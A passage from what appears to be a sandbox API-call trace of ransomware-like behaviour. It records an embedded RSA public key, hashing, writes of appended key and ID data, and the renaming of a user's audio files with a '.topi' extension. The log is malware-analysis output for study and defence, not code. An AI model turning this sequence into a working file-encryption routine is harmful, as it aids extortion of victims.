KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.028] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.028] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.029] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.029] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.029] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.029] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.029] GetLastError () returned 0x0 [0099.029] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.029] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.029] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.029] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.029] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13800) returned 0x9a06a00 [0099.030] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbfe0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc028 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.030] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51f8 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e51e0 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.031] GetCurrentThreadId () returned 0x8c4 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fafa0 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.031] GetCurrentThreadId () returned 0x8c4 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5210 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc028 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.035] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x137f4, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x137f4, lpOverlapped=0x0) returned 1 [0099.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0099.035] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x137f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.035] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.036] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.036] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.036] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.036] CloseHandle (hObject=0x6a8) returned 1 [0099.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6298 [0099.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0099.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0099.038] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hjpdvd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hjpdvd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hjpdvd.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hjpdvd.m4a.topi")) returned 1 [0099.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.038] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.039] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e0ad620, ftCreationTime.dwHighDateTime=0x1d5baf5, ftLastAccessTime.dwLowDateTime=0xcb6b6840, ftLastAccessTime.dwHighDateTime=0x1d5b886, ftLastWriteTime.dwLowDateTime=0xcb6b6840, ftLastWriteTime.dwHighDateTime=0x1d5b886, nFileSizeHigh=0x0, nFileSizeLow=0x163fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hv92hUyERA.wav", cAlternateFileName="HV92HU~1.WAV")) returned 1 [0099.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0099.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.040] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hv92hUyERA.wav") returned=".wav" [0099.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hv92hUyERA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hv92huyera.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.040] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=91132) returned 1 [0099.040] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.043] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x163d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.043] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 